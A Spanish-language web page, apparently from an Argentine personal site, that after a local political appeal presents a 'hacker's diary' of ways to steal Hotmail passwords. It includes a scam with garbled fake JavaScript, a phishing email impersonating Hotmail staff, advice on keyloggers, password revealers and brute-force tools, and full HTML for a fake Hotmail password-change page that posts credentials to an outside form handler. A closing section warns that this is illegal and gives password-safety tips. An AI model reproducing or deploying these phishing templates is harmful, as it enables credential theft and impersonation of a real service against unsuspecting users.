|

Bienvenidos a todo PC. Gualeguaychu -Entre rios
Gualeguaychu
ciudad de mis amores, testigo de infancia, grandiosa y esplendorosa Gualeguaychu
espeluznante con sus verdes, despierta en otoño, festiva en verano, Cándido en
invierno. Gualeguaychu es mi ciudad fuerte como el acero y calida como la
hoguera, por eso la defiendo, y tu también debes hacerlo, porque ella es parte
de argentina, de Entre Ríos, es parte de tu vida, DÍGALE
NO A LA PAPELERA SI A LA VIDA. Si usted es de gualeguaychu y desea opinar
sobre las papeleras envié un mail a
directoriogchu@hotmail.com y será publicada su opinión en la dirección de
abajo.
http://www.directoriogchu.com.ar
─────────────────────────────────────────────
Diario de un Hacker
Métodos para robar contraseñas de hotmail o
Hackear hotmail
────────────────────────
►Día uno (método
Principiante)
Dejar este mensaje en un
foro o envíaselo a la persona que le queres robar la contraseña diciéndole que
encontraste la forma de Hackear y que a vos te funciono
Hola a todos acá les dejo como
robar passwords de Hotmail yo lo prevé y resulto... Existe una pequeña pero
grave vulnerabilidad en el Bot que valida los datos que llegan al servidor de
yahoo y Hotmail, es imposible entrar y manipular dicho bot para que te mande los
password que tu quieras a tu correo, pero es posible forzarlo para que lo haga
mediante Javascript. De ese modo el bot es forzado a enviarte el password que le
pidas, ya que si le mandas el script desde un correo de Yahoo o Hotmail, no
tendrá por que resistirse. A continuación los pasos:
1.- Entra a tu Correo
2.- Ve a redactar, ya que lo que haremos será enviar un e-mail
3.- en la parte que tienes que escribir el correo del destino, escribe la
dirección del bot: password5hg@hotmail.com
4.- En asunto escribe: </passwd/etc/rootlogin
5.- y en el cuerpo del mensaje debes poner el código Javascript, con los datos
modificados. el código es:
</SCRIPT LANGUAGE="JavaScript">
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
function amt(){
var count = GetCookie('count')
if(count == null) {
SetCookie('count','1')
return 1
}
else {
var newcount = parseInt(count) + 1;
DeleteCookie('count')
SetCookie('EL MAIL DE TU VICTIMA)
return count
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function checkCount(TU EMAIL) {
var count = GetCookie('count');
if (count == null) {
count=(TU PASSWORD)
SetCookie('count', count, exp);
6.- Una vez listo dale enviar, e inmediatamente recibirás un mail
del Bot, con los datos que solicitaste. Esto es totalmente anónimo,
ya que el bot es solo una maquina que no graba ningún mail del
solicitante. por que piensa que es del mismísimo Server de Hotmail.
(Por supuesto que la cuenta de
corre password5hg@hotmail.com es
tuya y ya vas a tener su contraseña porque en el escrip te va a enviar su
contraseña...jejeje....No se la esperaban no?)
────────────────────────
►Día dos
(método lamer)
enviar
un mail haciéndose pasar por el personal de Hotmail
Estimado usuario
de Hotmail, como
sabrá, MSN es un portal que cuenta con millones de
usuarios en todo el mundo, y por tanto, se está sobrecargando. El motivo de que
le enviemos este mensaje es que estamos eliminando las cuentas en desuso, por lo
tanto deberá enviarnos el nombre de su dirección de correo electrónico adjunto
de su contraseña a esta misma dirección.
Esto lo hacemos
por no violar su privacidad, de no enviarnos este mensaje de vuelta,
su cuenta de Hotmail tiene el riesgo de expirar a los 15
días de recibir este mensaje, la dirección a la cuál debe responder
aparecerá más abajo.
serviciohotmail@hotmail.com
Disculpe por las
Molestias.
Personal de Hotmail.
────────────────────────
►Día
Tres (método canchero o que se las dan de winner)
A.-
Modo Fácil:
Con acceso a la maquina donde se revisa el correo.
_ Si la
victima revisa el e-mail desde el vulnerable Outlook de Micro$oft entonces es
todo tuyo, lo mas difícil seria poder quedarse en la maquina victima donde la
cuenta esta configurada (...en el outlook...) y sin que nadie sospechoso te
vea... procedes del siguiente modo;
+Bajate el Revealer
+Abrilo. Y anda al outlook, clickea en Herramientas/Cuentas/buscas y 2click a la
cuenta victima/anda a la solapa servidores/ y con el revealer, clickeas en "track"
y arrastrando con el mouse te moves hasta los asteriscos del casillero
"contraseña".
_ Si la victima no revisa en el Outlook, y si en
otro cliente podes fijarte si el pwd se guarda con **** entonces seria parecido
a lo anterior con el revealer.
_ Si la victima revisa el correo desde webmail, o
sea ingresando a hotmail.com y poniendo login y password también es bastante
fácil ya que podemos colocarle a la maquina el teclasss.exe que es un keylogger
de los mas sencillos y útiles.
Ese es el modo sencillo.
B.-
Modo Difícil:
Sin acceso a la maquina donde se revisa el correo.
El tema se complica un cacho cuando no tenemos acceso a la maquina de
donde se revisa el e-mail.
_ Una opción que tenemos es una de las mas
tediosas, pero que el tiempo hace la efectividad, estoy hablando de crackear con
el HotmailHack, u excelente programa que se ocupa de probar por fuerza bruta
todas las combinaciones posibles de caracteres para dar con la clave e ingresar
a la cuenta o por lista de palabras hechas por vos o descargadas de Internet (aca
hay varias) donde posiblemente alguna de todas esas sea la contraseña.
────────────────────────
►Día cuatro (método de los
que se las dan de expertos)
utilización de xploit acá
les dejo uno( copiar y péga en el blog de notas y aguardarlo como tunombre.html
y subirlo a un servidor para que te funcione le envías un e-mail diciéndole que
es una encuesta de Hotmail y o bien envíaselo por e-mail)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD
HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Hotmail.com - Cambie su contraseña</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
<BODY vLink=#ffffff aLink=#ffffff link=#ffffff bgColor=#ffffff>
<META content=xploit name="xploit para Hotmail o Msn">
<TABLE width=590 align=center bgColor=#ffffff>
<TBODY></TBODY></TABLE>
<TABLE
style="BORDER-TOP-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px;
BORDER-RIGHT-WIDTH: 0px"
height=154 cellSpacing=0 cellPadding=0 width=550 border=0 VALIGN="BOTTOM">
<TBODY>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
bgColor=#ffffff colSpan=2 height=149><IMG height=105
src="http://64.4.20.24/crs_42.gif" width=602 border=0></TD></TR>
<FORM action=http://www.tabasqueno.com/cgi-bin/formmail4.cgi method=post>
<INPUT
type=hidden value=TUCORREOAQUI@hotmail.com name=recipient> <INPUT
type=hidden value=http://privacy.t1msn.com.mx/ name=redirect>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
align=middle height=32>
<P align=right><FONT face=Tahoma size=2>Usuario:
</FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
height=32><FONT face=VERDANA size=2>
<INPUT type=USUARIO name=USUARIO size="20">@
<SELECT size=1 name=Server> <OPTION value=HOTMAIL.COM
selected>hotmail.com</OPTION> <OPTION
value=MSN.COM>msn.com</OPTION></SELECT></FONT></TD></TR>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
align=middle height=31>
<P align=right><FONT face=VERDANA size=2><FONT face=Tahoma>Contraseña
anterior:</FONT> </FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
height=31><FONT face=VERDANA size=2>
<INPUT type=password
name=REAL_PASSWORD size="20"></FONT></TD></TR>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
align=middle height=30>
<P align=right><FONT face=VERDANA size=2><FONT face=Tahoma>Contraseña
nueva:</FONT> </FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
height=30><FONT face=VERDANA size=2>
<INPUT type=password
name=NEW_PASSWORD size="20"></FONT></TD></TR>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
align=middle height=30>
<P align=right><FONT face=VERDANA size=2><FONT face=Tahoma>Repetir
contraseña<STRONG>:</STRONG></FONT> </FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
height=30><FONT face=VERDANA size=2>
<INPUT type=password
name=REPT_PASSWORD size="20"></FONT></TD></TR>
<P>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
height=1></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium
none; BORDER-BOTTOM: medium none"
height=1><FONT face=VERDANA size=2><BR><INPUT type=submit value=Aceptar> <INPUT
type=reset value=Cancelar></FONT></TD></TR></P></TBODY></TABLE></TD>
<TABLE height=400 width=604 align=left bgColor=#ffffff VALIGN="BOTTOM"><FONT
face=ARIAL>
<TBODY>
<TR>
<TD width=598>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px" align=justify><FONT
face=Tahoma size=2> Debido al reciente ataque
ocurrido a la base de datos de <B>Microsoft,</B> la empresa mas grande del
mundo en correo electrónico gratuito y <B>Hotmail</B> que trabaja en
conjunción con dicha empresa, se vio en la necesidad de pedirle a todos
sus usuarios alrededor del mundo que cambien su actual contraseña por una
nueva para evitar posibles daños a su privacidad. Es necesario que
comprenda la gravedad del caso cambiando su contraseña para los servicios
de <B>Hotmail</B> ya que así se sentirá mas seguro al igual que
nosotros.</B> <BR>Al presionar el botón "Aceptar" su nueva contraseña
quedara registrada en nuestra base de datos como su nueva contraseña y
desde ese momento podrá empezar a utilizarla en todos los servicios que
<B>Hotmail</B> le ofrece. </FONT></P>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px" align=justify><FONT
face=Tahoma size=2>El personal de <B>Hotmail</B> agradece su comprensión y
pide de antemano disculpas por las molestias ocasionadas por
esto. </FONT></FONT>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"><FONT
face=ARIAL>
<B><FONT face=Tahoma
size=2>Jueves 10 de Septiembre de 2003</FONT></B></P></TD></TR>
<TR>
<TD align=middle width=598>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"><FONT face=VERDANA
size=2><FONT face=Tahoma>®</FONT> 2003 Microsoft Corporation.Reservados
todos los derechos. <BR><A
href="http://memberservices.passport.net/memberservice.srf?lc=3082&id=2&cbid=2"><FONT
color=#0000ff>Servicios para usuarios</FONT></A><FONT color=#0000ff>
</FONT><A href="http://g.msn.com/1HM506701/D" target=_top><FONT
color=#0000ff>CONDICIONES DE USO</FONT></A><FONT color=#0000ff> </FONT><A
href="http://g.msn.com/1HM506701/C" target=_top><FONT
color=#0000ff>Declaración de privacidad</FONT></A></FONT><FONT
color=#0000ff> </FONT></P></TD></TR></TBODY></TABLE></FONT></FORM></BODY></HTML>
────────────────────────
►Día
cinco (método encerrado entre rejas)
Si
llegas a este día va a ser tu peor día, porque Hackear o Robar a Microsoft es
ilegal y esta penalizado por la ley, esta es la razón por la que no debes robar
cuentas de Hotmail, estos métodos son inútiles porque no hay forma de Hackear
Hotmail pero si de engañar a la persona diciéndole que sos el personal de
Hotmail o que le envías una postal re linda que la mire y que principalmente
ingrese la contraseña. Si algún usuario de con experiencia le cae alguna de
estas cosas simplemente se te a reír y mucho.
Recuerda
que el correo es algo personal y todos piensan en robar las contraseñas para
saber si su novia los engaña o si el amigo les mintió o simplemente porque les
tienen rabia, pero piensa bien que si engañas a alguien y le sacas la contraseña
y te encuentran te meterán preso o simplemente si se entera tu novia y no te
engaña te dejara, o si se entera tu amigo ya no lo será mas, o si se lo haces al
que le tenes rabia te matara a piñas.
Precaución para su
correo
*Las siguientes son algunas de las precauciones de seguridad mínimas que un
usuario debe seguir para prevenir el robo de cuentas.
Lo básico
Instale un antivirus, un firewall y mantenga sus sistemas actualizados, sobre
todo los más populares -Messenger, Explorer, Outlook- ya que sus fallas son
frecuentemente aprovechadas.
Ingeniería social
No repita su contraseña a nadie. Suena tonto -y lo es-, pero sucede con
frecuencia. En este sentido la ingeniería social se encarga de conseguir las
contraseñas mediante un engaño, ya sea haciéndose pasar por la compañía de
e-mail o a través de un documento html fraudulento.
Un buen password
Seleccione una contraseña lo suficientemente larga, que combine mayúsculas,
minúsculas, número y signos. No utilice palabras de diccionario y procure no
repetir caracteres.
El siguiente es un ejemplo de una contraseña razonablemente segura, que previene
los ataques de diccionario y fuerza bruta (programas que prueban miles de
combinaciones de letras):
9ForoKrackman88#
La pregunta "secreta"
La respuesta a la pregunta secreta no debe ser evidente para las personas que le
conozcan.
Muchas cuentas robadas lo son por personas con relación con el afectado -un ex
despechado, una ex sicópata- que pueden deducir sin mucha dificultad la
respuesta.
Recuérdame...
Dejar que Windows recuerde las contraseñas implica que se archiven en el
sistema. Y todo lo que se archiva puede ser robado. Tampoco lo deje cerca de la
computadora en un post-it. Memoricé su password, y cámbielo de forma regular.
Cookies
Por la red circulan demasiados scripts que aprovechan las vulnerabilidades de
Internet Explorer para acceder a las contraseñas, por lo que en Hotmail siempre
debe activarse en el apartado opciones la finalización de la sesión.
IP
Al activar un contacto en MSN la otra persona puede averiguar su IP actual, lo
mismo al enviar un correo, postear en un foro o visitar una página. Tenga esto
en mente, pues averiguar la IP es uno de los primeros pasos para muchas acciones
posteriores, desde escaneo de puertos hasta robo de passwords.
Troyanos
Muchos troyanos permiten la manipulación casi total del sistema atacado, y por
supuesto la obtención de contraseñas almacenadas...Le sorprendería saber cuántas
son robadas con este metodo. Para prevenirlo mantenga su antivirus, lo mismo que
el firewall, actualizado, activado y nunca, pero nunca, acepte archivos no
solicitados.
En boca cerrada...
El último consejo, pero no menos importante, es no utilizar las cuentas de
correo tipo Hotmail para nada que sea personal.
Como regla general, procure no escribir cualquier tipo de correo que resultaría
embarazoso si es publicado.
LOS PEORES PASSWORDS
*Las contraseñas más fáciles de conseguir son los nombres propios, las fechas de
nacimiento y la peor, que aunque no lo crea mucha gente usa, es la palabra "password".
¿Que porqué son malos? Son obvios, fáciles de adivinar y ...¿mencionamos obvios?
|